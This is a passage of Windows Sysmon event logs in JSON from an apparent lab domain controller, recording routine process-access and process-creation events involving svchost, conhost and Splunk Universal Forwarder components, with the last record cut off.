{"EventTime":"2020-08-01 07:57:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4127,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:40.654\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:40.654","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4128,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:40.654\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:40.654","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4129,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:40.654\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:40.654","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4130,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:40.654\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:40.654","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4131,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:40.654\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:40.654","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4132,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:40.654\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2074-5F25-0000-0010BD290600}\r\nTargetProcessId: 2952\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:40.654","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2074-5F25-0000-0010BD290600}","TargetProcessId":"2952","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4133,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:41.342\r\nProcessGuid: {41C8662E-2075-5F25-0000-00107E2B0600}\r\nProcessId: 2440\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:57:41.342","ProcessGuid":"{41C8662E-2075-5F25-0000-00107E2B0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4134,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:41.341\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2075-5F25-0000-00107E2B0600}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:41.341","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2075-5F25-0000-00107E2B0600}","TargetProcessId":"2440","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4135,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:41.341\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2075-5F25-0000-00107E2B0600}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 